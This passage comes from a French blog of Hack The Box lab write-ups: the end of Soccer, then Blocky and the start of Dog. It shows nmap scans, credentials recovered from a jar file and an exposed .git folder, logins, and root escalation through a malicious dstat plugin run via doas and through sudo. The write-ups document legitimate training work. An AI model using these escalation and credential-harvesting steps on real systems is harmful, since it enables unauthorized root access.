class="o">)</span>-<span class="o">[</span>~/htb/Soccer<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh player@soc-player.soccer.htb </span></span><span class="line"><span class="cl">The authenticity of host <span class="s1">&#39;soc-player.soccer.htb (10.10.11.194)&#39;</span> can<span class="s1">&#39;t be established. </span></span></span><span class="line"><span class="cl"><span class="s1">ED25519 key fingerprint is SHA256:PxRZkGxbqpmtATcgie2b7E8Sj3pw1L5jMEqe77Ob3FE. </span></span></span><span class="line"><span class="cl"><span class="s1">This key is not known by any other names. </span></span></span><span class="line"><span class="cl"><span class="s1">Are you sure you want to continue connecting (yes/no/[fingerprint])? yes </span></span></span><span class="line"><span class="cl"><span class="s1">Warning: Permanently added &#39;</span>soc-player.soccer.htb<span class="s1">&#39; (ED25519) to the list of known hosts. </span></span></span><span class="line"><span class="cl"><span class="s1">player@soc-player.soccer.htb&#39;</span>s password: </span></span><span class="line"><span class="cl">Welcome to Ubuntu 20.04.5 LTS <span class="o">(</span>GNU/Linux 5.4.0-135-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> * Documentation: https://help.ubuntu.com </span></span><span class="line"><span class="cl"> * Management: https://landscape.canonical.com </span></span><span class="line"><span class="cl"> * Support: https://ubuntu.com/advantage </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> System information as of Wed Mar <span class="m">12</span> 13:15:53 UTC <span class="m">2025</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> System load: 0.0 </span></span><span class="line"><span class="cl"> Usage of /: 72.7% of 3.84GB </span></span><span class="line"><span class="cl"> Memory usage: 29% </span></span><span class="line"><span class="cl"> Swap usage: 0% </span></span><span class="line"><span class="cl"> Processes: <span class="m">244</span> </span></span><span class="line"><span class="cl"> Users logged in: <span class="m">0</span> </span></span><span class="line"><span class="cl"> IPv4 address <span class="k">for</span> eth0: 10.10.11.194 </span></span><span class="line"><span class="cl"> IPv6 address <span class="k">for</span> eth0: dead:beef::250:56ff:fe94:b9b0 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="m">0</span> updates can be applied immediately. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The list of available updates is more than a week old. </span></span><span class="line"><span class="cl">To check <span class="k">for</span> new updates run: sudo apt update </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Last login: Tue Dec <span class="m">13</span> 07:29:10 <span class="m">2022</span> from 10.10.14.19 </span></span><span class="line"><span class="cl">player@soccer:~$ ls </span></span><span class="line"><span class="cl">user.txt </span></span><span class="line"><span class="cl">player@soccer:~$ cat user.txt </span></span><span class="line"><span class="cl">5868.....2f04 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="suid-binary--doas">SUID Binary : doas </h3><p>On trouve le binaire SUID &ldquo;doas&rdquo; qui semble suspect, grâce à linpeas. En cherchant sur internet, on comprend comment il peut etre exploité. Dans un premier, il faut chercher le fichier de configuration :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">player@soccer:/usr/local/share/dstat$ find / -type f -name <span class="s2">&#34;doas.conf&#34;</span> 2&gt;/dev/null </span></span><span class="line"><span class="cl">/usr/local/etc/doas.conf </span></span><span class="line"><span class="cl">player@soccer:/usr/local/share/dstat$ cat /usr/local/etc/doas.conf </span></span><span class="line"><span class="cl">permit nopass player as root cmd /usr/bin/dstat </span></span></code></pre></td></tr></table> </div> </div><p>On remarque que player à le droit d&rsquo;executé /usr/bin/dstat en tant que root.</p> <p>Après quelques recherches, on remarque sur linpeas qu&rsquo;un dossier &ldquo;/usr/local/share/dstat&rdquo; est modifiable par root. Or, dstat a une liste de plugins qu&rsquo;il peut recherche et load depuis certains dossiers, dont notamment celui là. C&rsquo;est à dire que si on met un plugin dans ce dossier, nous avons un moyen d&rsquo;executer le code de ce plugin en executant dstat. Nous avon le droit d&rsquo;executer dstat en tant que root, le plugin va donc etre loadé puis son code executé avec les permissions super utilisateur :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">player@soccer:/usr/local/share/dstat$ <span class="nb">echo</span> <span class="s1">&#39;import os; os.execv(&#34;/bin/sh&#34;, [&#34;sh&#34;])&#39;</span> &gt; ./dstat_xxx.py </span></span><span class="line"><span class="cl">player@soccer:/usr/local/share/dstat$ /usr/local/bin/doas /usr/bin/dstat --xxx </span></span><span class="line"><span class="cl">/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib<span class="p">;</span> see the module<span class="err">&#39;</span>s documentation <span class="k">for</span> alternative uses </span></span><span class="line"><span class="cl"> import imp </span></span><span class="line"><span class="cl"><span class="c1">## whoami </span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1">## cat /root/root.txt</span> </span></span><span class="line"><span class="cl">8217.....cc19 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/blocky-htb/Mon, 10 Mar 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/blocky-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Blocky cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Blocky</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.37</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">notch : 8YsqfCTnvxAUeduzjNSXe22 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Blocky<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.37 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">21/tcp open ftp syn-ack ttl <span class="m">63</span> ProFTPD 1.3.5a </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXqVh031OUgTdcXsDwffHKL6T9f1GfJ1/x/b/dywX42sDZ5m1Hz46bKmbnWa0YD3LSRkStJDtyNXptzmEp31Fs2DUndVKui3LCcyKXY6FSVWp9ZDBzlW3aY8qa+y339OS3gp3aq277zYDnnA62U7rIltYp91u5VPBKi3DITVaSgzA8mcpHRr30e3cEGaLCxty58U2/lyCnx3I0Lh5rEbipQ1G7Cr6NMgmGtW6LrlJRQiWA1OK2/tDZbLhwtkjB82pjI/0T2gpA/vlZJH0elbMXW40Et6bOs2oK/V2bVozpoRyoQuts8zcRmCViVs8B3p7T1Qh/Z+7Ki91vgicfy4fl </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNgEpgEZGGbtm5suOAio9ut2hOQYLN39Uhni8i4E/Wdir1gHxDCLMoNPQXDOnEUO1QQVbioUUMgFRAXYLhilNF8<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILqVrP5vDD4MdQ2v3ozqDPxG1XXZOp5VPpVsFUROL6Vj </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.18 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to http://blocky.htb </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl">8192/tcp closed sophos reset ttl <span class="m">63</span> </span></span><span class="line"><span class="cl">25565/tcp open minecraft syn-ack ttl <span class="m">63</span> Minecraft 1.11.2 <span class="o">(</span>Protocol: 127, Message: A Minecraft Server, Users: 0/20<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="wordpress-website--jar-files">Wordpress website : jar files </h3><p>Sur le port 80, on trouve un <strong>wordpress</strong> avec un endpoint <strong>/plugins</strong>. En effectuant une requête GET vers cette page, on trouve 2 fichiers dont <strong>BlockyCore.jar</strong> contenant le mot de passe suivant : <code>8YsqfCTnvxAUeduzjNSXe22</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Blocky<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ strings com/myfirstplugin/BlockyCore.class </span></span><span class="line"><span class="cl">com/myfirstplugin/BlockyCore </span></span><span class="line"><span class="cl">java/lang/Object </span></span><span class="line"><span class="cl">sqlHost </span></span><span class="line"><span class="cl">Ljava/lang/String<span class="p">;</span> </span></span><span class="line"><span class="cl">sqlUser </span></span><span class="line"><span class="cl">sqlPass </span></span><span class="line"><span class="cl">&lt;init&gt; </span></span><span class="line"><span class="cl">Code </span></span><span class="line"><span class="cl"> localhost </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">8YsqfCTnvxAUeduzjNSXe22 </span></span><span class="line"><span class="cl">LineNumberTable </span></span><span class="line"><span class="cl">LocalVariableTable </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><h3 id="ftpssh-notch">FTP/SSH notch </h3><p>On trouve le user notch sur la page principale du wordpress. On l&rsquo;utilise pour se connecter en ftp, avec le mot de passe trouvé précédemmente et ça fonctionne :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Blocky<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ftp 10.10.10.37 </span></span><span class="line"><span class="cl">Connected to 10.10.10.37. </span></span><span class="line"><span class="cl"><span class="m">220</span> ProFTPD 1.3.5a Server <span class="o">(</span>Debian<span class="o">)</span> <span class="o">[</span>::ffff:10.10.10.37<span class="o">]</span> </span></span><span class="line"><span class="cl">Name <span class="o">(</span>10.10.10.37:kali<span class="o">)</span>: notch </span></span><span class="line"><span class="cl"><span class="m">331</span> Password required <span class="k">for</span> notch </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl"><span class="m">230</span> User notch logged in </span></span><span class="line"><span class="cl">Remote system <span class="nb">type</span> is UNIX. </span></span><span class="line"><span class="cl">Using binary mode to transfer files. </span></span><span class="line"><span class="cl">ftp&gt; ls </span></span><span class="line"><span class="cl"><span class="m">229</span> Entering Extended Passive Mode <span class="o">(||</span><span class="p">|</span>25323<span class="p">|</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="m">150</span> Opening ASCII mode data connection <span class="k">for</span> file list </span></span><span class="line"><span class="cl">drwxrwxr-x <span class="m">7</span> notch notch <span class="m">4096</span> Jul <span class="m">3</span> <span class="m">2017</span> minecraft </span></span><span class="line"><span class="cl">-r-------- <span class="m">1</span> notch notch <span class="m">33</span> Mar <span class="m">10</span> 09:54 user.txt </span></span><span class="line"><span class="cl"><span class="m">226</span> Transfer <span class="nb">complete</span> </span></span><span class="line"><span class="cl">ftp&gt; get user.txt </span></span><span class="line"><span class="cl">local: user.txt remote: user.txt </span></span><span class="line"><span class="cl"><span class="m">229</span> Entering Extended Passive Mode <span class="o">(||</span><span class="p">|</span>28224<span class="p">|</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="m">150</span> Opening BINARY mode data connection <span class="k">for</span> user.txt <span class="o">(</span><span class="m">33</span> bytes<span class="o">)</span> </span></span><span class="line"><span class="cl">100% <span class="p">|</span>*********************************************************************************************************************************************************************************************<span class="p">|</span> <span class="m">33</span> 315.94 KiB/s 00:00 ETA </span></span><span class="line"><span class="cl"><span class="m">226</span> Transfer <span class="nb">complete</span> </span></span><span class="line"><span class="cl"><span class="m">33</span> bytes received in 00:00 <span class="o">(</span>1.75 KiB/s<span class="o">)</span> </span></span><span class="line"><span class="cl">ftp&gt; ^D </span></span><span class="line"><span class="cl"><span class="m">221</span> Goodbye. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Blocky<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ cat user.txt </span></span><span class="line"><span class="cl">28f5.....2047 </span></span></code></pre></td></tr></table> </div> </div><p>On peut également se connecte en SSH.</p> <h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="notch---root">notch -&gt; root </h3><p>L&rsquo;utilisateur notch à le droit d&rsquo;effectuer n&rsquo;importe quelle commande en tant que root. Il nous suffit donc d&rsquo;ouvrir un shell avec <code>sudo su</code> pour obtenir les droits root sur la machine.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Blocky<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh notch@10.10.10.37 </span></span><span class="line"><span class="cl">notch@Blocky:~$ sudo -l </span></span><span class="line"><span class="cl"><span class="o">[</span>sudo<span class="o">]</span> password <span class="k">for</span> notch: </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> notch on Blocky: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User notch may run the following commands on Blocky: </span></span><span class="line"><span class="cl"> <span class="o">(</span>ALL : ALL<span class="o">)</span> ALL </span></span><span class="line"><span class="cl">notch@Blocky:~$ sudo su </span></span><span class="line"><span class="cl">root@Blocky:/home/notch# cat /root/root.txt </span></span><span class="line"><span class="cl">dc80.....2689 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/dog-htb/Sun, 09 Mar 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/dog-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Dog cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Dog</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.58</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop </span></span><span class="line"><span class="cl">tiffany : BackDropJ2024DS2024 </span></span><span class="line"><span class="cl">johncusack : BackDropJ2024DS2024 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Dog<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.58 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">3072</span> 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEJsqBRTZaxqvLcuvWuqOclXU1uxwUJv98W1TfLTgTYqIBzWAqQR7Y6fXBOUS6FQ9xctARWGM3w3AeDw+MW0j+iH83gc9J4mTFTBP8bXMgRqS2MtoeNgKWozPoy6wQjuRSUammW772o8rsU2lFPq3fJCoPgiC7dR4qmrWvgp5TV8GuExl7WugH6/cTGrjoqezALwRlKsDgmAl6TkAaWbCC1rQ244m58ymadXaAx5I5NuvCxbVtw32/eEuyqu+bnW8V2SdTTtLCNOe1Tq0XJz3mG9rw8oFH+Mqr142h81jKzyPO/YrbqZi2GvOGF+PNxMg+4kWLQ559we+7mLIT7ms0esal5O6GqIVPax0K21+GblcyRBCCNkawzQCObo5rdvtELh0CPRkBkbOPo4CfXwd/DxMnijXzhR/lCLlb2bqYUMDxkfeMnmk8HRF+hbVQefbRC/+vWf61o2l0IFEr1IJo3BDtJy5m2IcWCeFX3ufk5Fme8LTzAsk6G9hROXnBZg8<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM/NEdzq1MMEw7EsZsxWuDa+kSb+OmiGvYnPofRWZOOMhFgsGIWfg8KS4KiEUB2IjTtRovlVVot709BrZnCvU8Y<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPMpkoATGAIWQVbEl67rFecNZySrzt944Y/hWAyq4dPc </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-git: </span></span><span class="line"><span class="cl"><span class="p">|</span> 10.10.11.58:80/.git/ </span></span><span class="line"><span class="cl"><span class="p">|</span> Git repository found! </span></span><span class="line"><span class="cl"><span class="p">|</span> Repository description: Unnamed repository<span class="p">;</span> edit this file <span class="s1">&#39;description&#39;</span> to name the... </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Last commit message: todo: customize url aliases. reference:https://docs.backdro... </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-generator: Backdrop CMS <span class="m">1</span> <span class="o">(</span>https://backdropcms.org<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-robots.txt: <span class="m">22</span> disallowed entries </span></span><span class="line"><span class="cl"><span class="p">|</span> /core/ /profiles/ /README.md /web.config /admin </span></span><span class="line"><span class="cl"><span class="p">|</span> /comment/reply /filter/tips /node/add /search /user/register </span></span><span class="line"><span class="cl"><span class="p">|</span> /user/password /user/login /user/logout /?q<span class="o">=</span>admin /?q<span class="o">=</span>comment/reply </span></span><span class="line"><span class="cl"><span class="p">|</span> /?q<span class="o">=</span>filter/tips /?q<span class="o">=</span>node/add /?q<span class="o">=</span>search /?q<span class="o">=</span>user/password </span></span><span class="line"><span class="cl"><span class="p">|</span>_/?q<span class="o">=</span>user/register /?q<span class="o">=</span>user/login /?q<span class="o">=</span>user/logout </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Home <span class="p">|</span> Dog </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="website-with-git-files--git-dumper">website with .git files | git-dumper </h3><p>On trouve un serveur web avec un dossier .git. On peut donc utiliser git-dumper pour récupérer des fichiers et faire un git log eventullement pour trouver des infos:</p> <h3 id="mysql-credentials">mysql credentials </h3><p>Après analyse des fichiers, on trouve des credentials dans le fichier settings.php :</p> <blockquote> <p>&lsquo;mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop&rsquo;</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Dog<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ git-dumper http://10.10.11.58/.git/ ./website </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Dog<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ <span class="nb">cd</span> website/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Dog<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ grep -rni <span class="s2">&#34;\$database =&#34;</span> </span></span><span class="line"><span class="cl">website/settings.php:15:<span class="nv">$database</span> <span class="o">=</span> <span class="s1">&#39;mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl">website/core/modules/simpletest/tests/database_test.test:3653: <span class="nv">$database</span> <span class="o">=</span> Database::getConnection<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl">website/core/modules/system/system.admin.inc:2625: <span class="nv">$database</span> <span class="o">=</span> <span class="nv">$databases</span><span class="o">[</span><span class="s1">&#39;default&#39;</span><span class="o">][</span><span class="s1">&#39;default&#39;</span><span class="o">]</span><span 